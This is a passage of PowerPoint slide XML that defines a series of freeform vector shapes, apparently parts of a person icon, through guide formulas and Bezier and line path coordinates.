                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="72" h="187">
                  <a:moveTo>
                    <a:pt x="0" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="5"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="28" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="60"/>
                    <a:pt x="66" y="121"/>
                    <a:pt x="72" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="187"/>
                    <a:pt x="43" y="187"/>
                    <a:pt x="43" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="123"/>
                    <a:pt x="27" y="66"/>
                    <a:pt x="0" y="8"/>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6" name="Freeform 639"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6048639" y="4828045"/>
              <a:ext cx="131449" cy="585200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 85 w 104"/>
                <a:gd name="T1" fmla="*/ 463 h 463"/>
                <a:gd name="T2" fmla="*/ 14 w 104"/>
                <a:gd name="T3" fmla="*/ 463 h 463"/>
                <a:gd name="T4" fmla="*/ 0 w 104"/>
                <a:gd name="T5" fmla="*/ 0 h 463"/>
                <a:gd name="T6" fmla="*/ 104 w 104"/>
                <a:gd name="T7" fmla="*/ 0 h 463"/>
                <a:gd name="T8" fmla="*/ 85 w 104"/>
                <a:gd name="T9" fmla="*/ 463 h 463"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="104" h="463">
                  <a:moveTo>
                    <a:pt x="85" y="463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14" y="463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="46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7" name="Freeform 640"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6182616" y="4828045"/>
              <a:ext cx="131449" cy="585200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 90 w 104"/>
                <a:gd name="T1" fmla="*/ 463 h 463"/>
                <a:gd name="T2" fmla="*/ 19 w 104"/>
                <a:gd name="T3" fmla="*/ 463 h 463"/>
                <a:gd name="T4" fmla="*/ 0 w 104"/>
                <a:gd name="T5" fmla="*/ 0 h 463"/>
                <a:gd name="T6" fmla="*/ 104 w 104"/>
                <a:gd name="T7" fmla="*/ 0 h 463"/>
                <a:gd name="T8" fmla="*/ 90 w 104"/>
                <a:gd name="T9" fmla="*/ 463 h 463"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="104" h="463">
                  <a:moveTo>
                    <a:pt x="90" y="463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19" y="463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="46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8" name="Freeform 641"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5905815" y="4777487"/>
              <a:ext cx="61933" cy="72044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 21"/>
                <a:gd name="T1" fmla="*/ 0 h 24"/>
                <a:gd name="T2" fmla="*/ 0 w 21"/>
                <a:gd name="T3" fmla="*/ 13 h 24"/>
                <a:gd name="T4" fmla="*/ 10 w 21"/>
                <a:gd name="T5" fmla="*/ 24 h 24"/>
                <a:gd name="T6" fmla="*/ 21 w 21"/>
                <a:gd name="T7" fmla="*/ 13 h 24"/>
                <a:gd name="T8" fmla="*/ 21 w 21"/>
                <a:gd name="T9" fmla="*/ 0 h 24"/>
                <a:gd name="T10" fmla="*/ 0 w 21"/>
                <a:gd name="T11" fmla="*/ 0 h 24"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21" h="24">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="13"/>
                    <a:pt x="0" y="13"/>
                    <a:pt x="0" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19"/>
                    <a:pt x="4" y="24"/>
                    <a:pt x="10" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="24"/>
                    <a:pt x="21" y="19"/>
                    <a:pt x="21" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="21"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89" name="Freeform 642"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6397484" y="4777487"/>
              <a:ext cx="65724" cy="72044"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 22"/>
                <a:gd name="T1" fmla="*/ 0 h 24"/>
                <a:gd name="T2" fmla="*/ 0 w 22"/>
                <a:gd name="T3" fmla="*/ 13 h 24"/>
                <a:gd name="T4" fmla="*/ 11 w 22"/>
                <a:gd name="T5" fmla="*/ 24 h 24"/>
                <a:gd name="T6" fmla="*/ 22 w 22"/>
                <a:gd name="T7" fmla="*/ 13 h 24"/>
                <a:gd name="T8" fmla="*/ 22 w 22"/>
                <a:gd name="T9" fmla="*/ 0 h 24"/>
                <a:gd name="T10" fmla="*/ 0 w 22"/>
                <a:gd name="T11" fmla="*/ 0 h 24"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="22" h="24">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="13"/>
                    <a:pt x="0" y="13"/>
                    <a:pt x="0" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19"/>
                    <a:pt x="5" y="24"/>
                    <a:pt x="11" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="24"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="22" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="22" y="0"/>
                    <a:pt x="22"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0" name="Freeform 643"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6022097" y="4189759"/>
              <a:ext cx="322302" cy="638285"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 167 w 255"/>
                <a:gd name="T1" fmla="*/ 0 h 505"/>
                <a:gd name="T2" fmla="*/ 127 w 255"/>
                <a:gd name="T3" fmla="*/ 314 h 505"/>
                <a:gd name="T4" fmla="*/ 87 w 255"/>
                <a:gd name="T5" fmla="*/ 0 h 505"/>
                <a:gd name="T6" fmla="*/ 0 w 255"/>
                <a:gd name="T7" fmla="*/ 23 h 505"/>
                <a:gd name="T8" fmla="*/ 4 w 255"/>
                <a:gd name="T9" fmla="*/ 505 h 505"/>
                <a:gd name="T10" fmla="*/ 250 w 255"/>
                <a:gd name="T11" fmla="*/ 505 h 505"/>
                <a:gd name="T12" fmla="*/ 255 w 255"/>
                <a:gd name="T13" fmla="*/ 23 h 505"/>
                <a:gd name="T14" fmla="*/ 167 w 255"/>
                <a:gd name="T15" fmla="*/ 0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505">
                  <a:moveTo>
                    <a:pt x="167" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="127" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250" y="505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167"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1" name="Freeform 644"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6263508" y="40077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2" name="Freeform 645"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6263508" y="40039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3" name="Freeform 646"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6260980" y="39951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4" name="Freeform 647"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6260980" y="399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5" name="Freeform 648"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6102988" y="399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6" name="Freeform 649"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6266035" y="4010281"/>
              <a:ext cx="0" cy="252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7" name="Freeform 650"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6266035" y="4012809"/>
              <a:ext cx="0" cy="379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8" name="Freeform 651"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6257188" y="39925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799" name="Freeform 652"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6096669" y="40128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00" name="Freeform 653"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6099197" y="40039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01" name="Freeform 654"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6099197" y="40014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02" name="Freeform 655"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6096669" y="40077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03" name="Freeform 656"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6081501" y="3986267"/>
              <a:ext cx="199701" cy="179478"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 64 w 67"/>
                <a:gd name="T1" fmla="*/ 15 h 60"/>
                <a:gd name="T2" fmla="*/ 62 w 67"/>
                <a:gd name="T3" fmla="*/ 14 h 60"/>
                <a:gd name="T4" fmla="*/ 62 w 67"/>
                <a:gd name="T5" fmla="*/ 10 h 60"/>
                <a:gd name="T6" fmla="*/ 62 w 67"/>
                <a:gd name="T7" fmla="*/ 9 h 60"/>
                <a:gd name="T8" fmla="*/ 62 w 67"/>
                <a:gd name="T9" fmla="*/ 9 h 60"/>
                <a:gd name="T10" fmla="*/ 62 w 67"/>
                <a:gd name="T11" fmla="*/ 8 h 60"/>
                <a:gd name="T12" fmla="*/ 61 w 67"/>
                <a:gd name="T13" fmla="*/ 7 h 60"/>
                <a:gd name="T14" fmla="*/ 61 w 67"/>
                <a:gd name="T15" fmla="*/ 7 h 60"/>
                <a:gd name="T16" fmla="*/ 61 w 67"/>
                <a:gd name="T17" fmla="*/ 6 h 60"/>
                <a:gd name="T18" fmla="*/ 61 w 67"/>
                <a:gd name="T19" fmla="*/ 6 h 60"/>
                <a:gd name="T20" fmla="*/ 60 w 67"/>
                <a:gd name="T21" fmla="*/ 4 h 60"/>
                <a:gd name="T22" fmla="*/ 60 w 67"/>
                <a:gd name="T23" fmla="*/ 4 h 60"/>
                <a:gd name="T24" fmla="*/ 60 w 67"/>
                <a:gd name="T25" fmla="*/ 3 h 60"/>
                <a:gd name="T26" fmla="*/ 60 w 67"/>
                <a:gd name="T27" fmla="*/ 3 h 60"/>
                <a:gd name="T28" fmla="*/ 59 w 67"/>
                <a:gd name="T29" fmla="*/ 2 h 60"/>
                <a:gd name="T30" fmla="*/ 59 w 67"/>
                <a:gd name="T31" fmla="*/ 2 h 60"/>
                <a:gd name="T32" fmla="*/ 54 w 67"/>
                <a:gd name="T33" fmla="*/ 3 h 60"/>
                <a:gd name="T34" fmla="*/ 45 w 67"/>
                <a:gd name="T35" fmla="*/ 1 h 60"/>
                <a:gd name="T36" fmla="*/ 27 w 67"/>
                <a:gd name="T37" fmla="*/ 3 h 60"/>
                <a:gd name="T38" fmla="*/ 9 w 67"/>
                <a:gd name="T39" fmla="*/ 0 h 60"/>
                <a:gd name="T40" fmla="*/ 7 w 67"/>
                <a:gd name="T41" fmla="*/ 4 h 60"/>
                <a:gd name="T42" fmla="*/ 7 w 67"/>
                <a:gd name="T43" fmla="*/ 4 h 60"/>
                <a:gd name="T44" fmla="*/ 6 w 67"/>
                <a:gd name="T45" fmla="*/ 5 h 60"/>
                <a:gd name="T46" fmla="*/ 6 w 67"/>
                <a:gd name="T47" fmla="*/ 5 h 60"/>
                <a:gd name="T48" fmla="*/ 6 w 67"/>
                <a:gd name="T49" fmla="*/ 6 h 60"/>
                <a:gd name="T50" fmla="*/ 6 w 67"/>
                <a:gd name="T51" fmla="*/ 6 h 60"/>
                <a:gd name="T52" fmla="*/ 5 w 67"/>
                <a:gd name="T53" fmla="*/ 7 h 60"/>
                <a:gd name="T54" fmla="*/ 5 w 67"/>
                <a:gd name="T55" fmla="*/ 7 h 60"/>
                <a:gd name="T56" fmla="*/ 5 w 67"/>
                <a:gd name="T57" fmla="*/ 9 h 60"/>
                <a:gd name="T58" fmla="*/ 5 w 67"/>
                <a:gd name="T59" fmla="*/ 9 h 60"/>
                <a:gd name="T60" fmla="*/ 5 w 67"/>
                <a:gd name="T61" fmla="*/ 10 h 60"/>
                <a:gd name="T62" fmla="*/ 5 w 67"/>
                <a:gd name="T63" fmla="*/ 14 h 60"/>
                <a:gd name="T64" fmla="*/ 4 w 67"/>
                <a:gd name="T65" fmla="*/ 14 h 60"/>
                <a:gd name="T66" fmla="*/ 0 w 67"/>
                <a:gd name="T67" fmla="*/ 19 h 60"/>
                <a:gd name="T68" fmla="*/ 0 w 67"/>
                <a:gd name="T69" fmla="*/ 30 h 60"/>
                <a:gd name="T70" fmla="*/ 5 w 67"/>
                <a:gd name="T71" fmla="*/ 35 h 60"/>
                <a:gd name="T72" fmla="*/ 21 w 67"/>
                <a:gd name="T73" fmla="*/ 60 h 60"/>
                <a:gd name="T74" fmla="*/ 46 w 67"/>
                <a:gd name="T75" fmla="*/ 60 h 60"/>
                <a:gd name="T76" fmla="*/ 62 w 67"/>
                <a:gd name="T77" fmla="*/ 35 h 60"/>
                <a:gd name="T78" fmla="*/ 67 w 67"/>
                <a:gd name="T79" fmla="*/ 30 h 60"/>
                <a:gd name="T80" fmla="*/ 67 w 67"/>
                <a:gd name="T81" fmla="*/ 19 h 60"/>
                <a:gd name="T82" fmla="*/ 64 w 67"/>
                <a:gd name="T83"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60">
                  <a:moveTo>
                    <a:pt x="64" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="15"/>
                    <a:pt x="62" y="14"/>
                    <a:pt x="62" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="10"/>
                    <a:pt x="62" y="10"/>
                    <a:pt x="62" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="10"/>
                    <a:pt x="62" y="9"/>
                    <a:pt x="62" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="9"/>
                    <a:pt x="62" y="9"/>
                    <a:pt x="62" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="8"/>
                    <a:pt x="62" y="8"/>
                    <a:pt x="62" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="8"/>
                    <a:pt x="62" y="7"/>
                    <a:pt x="61" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="7"/>
                    <a:pt x="61" y="7"/>
                    <a:pt x="61" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="6"/>
                    <a:pt x="61" y="6"/>
                    <a:pt x="61" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="6"/>
                    <a:pt x="61" y="6"/>
                    <a:pt x="61" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="5"/>
                    <a:pt x="61" y="5"/>
                    <a:pt x="60" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="4"/>
                    <a:pt x="60" y="4"/>
                    <a:pt x="60" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="4"/>
                    <a:pt x="60" y="4"/>
                    <a:pt x="60" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="3"/>
                    <a:pt x="60" y="3"/>
                    <a:pt x="60" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="3"/>
                    <a:pt x="59" y="3"/>
                    <a:pt x="59" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="2"/>
                    <a:pt x="59" y="2"/>
                    <a:pt x="59" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="3"/>
                    <a:pt x="56" y="3"/>
                    <a:pt x="54" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="3"/>
                    <a:pt x="47" y="2"/>
                    <a:pt x="45" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="2"/>
                    <a:pt x="34" y="3"/>
                    <a:pt x="27" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="3"/>
                    <a:pt x="14" y="2"/>
                    <a:pt x="9" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1"/>
                    <a:pt x="7" y="2"/>
                    <a:pt x="7" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="4"/>
                    <a:pt x="7" y="4"/>
                    <a:pt x="7" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="4"/>
                    <a:pt x="6" y="4"/>
                    <a:pt x="6" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="5"/>
                    <a:pt x="6" y="5"/>
                    <a:pt x="6" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="5"/>
                    <a:pt x="6" y="6"/>
                    <a:pt x="6" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="6"/>
                    <a:pt x="6" y="6"/>
                    <a:pt x="6" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="6"/>
                    <a:pt x="5" y="7"/>
                    <a:pt x="5" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="7"/>
                    <a:pt x="5" y="7"/>
                    <a:pt x="5" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="8"/>
                    <a:pt x="5" y="8"/>
                    <a:pt x="5" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="9"/>
                    <a:pt x="5" y="9"/>
                    <a:pt x="5" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="9"/>
                    <a:pt x="5" y="10"/>
                    <a:pt x="5" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="14"/>
                    <a:pt x="5" y="14"/>
                    <a:pt x="5" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="14"/>
                    <a:pt x="4" y="14"/>
                    <a:pt x="4" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="15"/>
                    <a:pt x="0" y="17"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="0" y="30"/>
                    <a:pt x="0" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="2" y="35"/>
                    <a:pt x="5" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="35"/>
                    <a:pt x="13" y="60"/>
                    <a:pt x="21" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="60"/>
                    <a:pt x="46" y="60"/>
                    <a:pt x="46" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="60"/>
                    <a:pt x="62" y="35"/>
                    <a:pt x="62" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="35"/>
                    <a:pt x="67" y="32"/>
                    <a:pt x="67" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="19"/>
                    <a:pt x="67" y="19"/>
                    <a:pt x="67" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="17"/>
                    <a:pt x="65" y="15"/>
                    <a:pt x="64" y="15"/>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04" name="Freeform 657"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6099197" y="4022921"/>
              <a:ext cx="170631" cy="55613"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 57"/>
                <a:gd name="T1" fmla="*/ 2 h 19"/>
                <a:gd name="T2" fmla="*/ 42 w 57"/>
                <a:gd name="T3" fmla="*/ 1 h 19"/>
                <a:gd name="T4" fmla="*/ 28 w 57"/>
                <a:gd name="T5" fmla="*/ 4 h 19"/>
                <a:gd name="T6" fmla="*/ 15 w 57"/>
                <a:gd name="T7" fmla="*/ 1 h 19"/>
                <a:gd name="T8" fmla="*/ 0 w 57"/>
                <a:gd name="T9" fmla="*/ 2 h 19"/>
                <a:gd name="T10" fmla="*/ 0 w 57"/>
                <a:gd name="T11" fmla="*/ 4 h 19"/>
                <a:gd name="T12" fmla="*/ 2 w 57"/>
                <a:gd name="T13" fmla="*/ 6 h 19"/>
                <a:gd name="T14" fmla="*/ 3 w 57"/>
                <a:gd name="T15" fmla="*/ 10 h 19"/>
                <a:gd name="T16" fmla="*/ 17 w 57"/>
                <a:gd name="T17" fmla="*/ 18 h 19"/>
                <a:gd name="T18" fmla="*/ 26 w 57"/>
                <a:gd name="T19" fmla="*/ 8 h 19"/>
                <a:gd name="T20" fmla="*/ 28 w 57"/>
                <a:gd name="T21" fmla="*/ 7 h 19"/>
                <a:gd name="T22" fmla="*/ 30 w 57"/>
                <a:gd name="T23" fmla="*/ 8 h 19"/>
                <a:gd name="T24" fmla="*/ 40 w 57"/>
                <a:gd name="T25" fmla="*/ 18 h 19"/>
                <a:gd name="T26" fmla="*/ 53 w 57"/>
                <a:gd name="T27" fmla="*/ 10 h 19"/>
                <a:gd name="T28" fmla="*/ 55 w 57"/>
                <a:gd name="T29" fmla="*/ 6 h 19"/>
                <a:gd name="T30" fmla="*/ 56 w 57"/>
                <a:gd name="T31" fmla="*/ 4 h 19"/>
                <a:gd name="T32" fmla="*/ 56 w 57"/>
                <a:gd name="T33" fmla="*/ 2 h 19"/>
                <a:gd name="T34" fmla="*/ 21 w 57"/>
                <a:gd name="T35" fmla="*/ 14 h 19"/>
                <a:gd name="T36" fmla="*/ 11 w 57"/>
                <a:gd name="T37" fmla="*/ 16 h 19"/>
                <a:gd name="T38" fmla="*/ 5 w 57"/>
                <a:gd name="T39" fmla="*/ 7 h 19"/>
                <a:gd name="T40" fmla="*/ 15 w 57"/>
                <a:gd name="T41" fmla="*/ 2 h 19"/>
                <a:gd name="T42" fmla="*/ 22 w 57"/>
                <a:gd name="T43" fmla="*/ 4 h 19"/>
                <a:gd name="T44" fmla="*/ 21 w 57"/>
                <a:gd name="T45" fmla="*/ 14 h 19"/>
                <a:gd name="T46" fmla="*/ 45 w 57"/>
                <a:gd name="T47" fmla="*/ 16 h 19"/>
                <a:gd name="T48" fmla="*/ 35 w 57"/>
                <a:gd name="T49" fmla="*/ 14 h 19"/>
                <a:gd name="T50" fmla="*/ 35 w 57"/>
                <a:gd name="T51" fmla="*/ 4 h 19"/>
                <a:gd name="T52" fmla="*/ 42 w 57"/>
                <a:gd name="T53" fmla="*/ 2 h 19"/>
                <a:gd name="T54" fmla="*/ 52 w 57"/>
                <a:gd name="T55" fmla="*/ 7 h 19"/>
                <a:gd name="T56" fmla="*/ 45 w 57"/>
                <a:gd name="T5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9">
                  <a:moveTo>
                    <a:pt x="56" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="2"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="42" y="1"/>
                  </a:cubicBezTo>
